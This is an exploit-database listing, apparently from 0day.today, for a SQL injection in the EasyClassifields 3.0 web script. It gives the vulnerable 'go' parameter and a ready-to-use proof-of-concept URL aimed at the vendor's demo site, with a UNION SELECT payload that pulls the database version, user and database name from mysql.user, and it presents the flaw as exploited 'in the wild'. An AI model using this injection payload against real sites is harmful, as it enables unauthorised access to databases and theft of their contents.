EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability

2008-09-01T00:00:00
ID 1337DAY-ID-3581
Type zdt
Reporter e.wiZz!
Modified 2008-09-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability
============================================================



##############EasyClassifields v3.0 SQL Injection#######################

####By:     e.wiZz!
####Info:   Bosnian Idiot FTW!
####Site:  infected.blogger.ba
####Greetz:   Luigi,suN8Hclf
In the wild...

##################################################################

###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:

http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>

PoC on demo site:

http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user



#  0day.today [2018-04-05]  #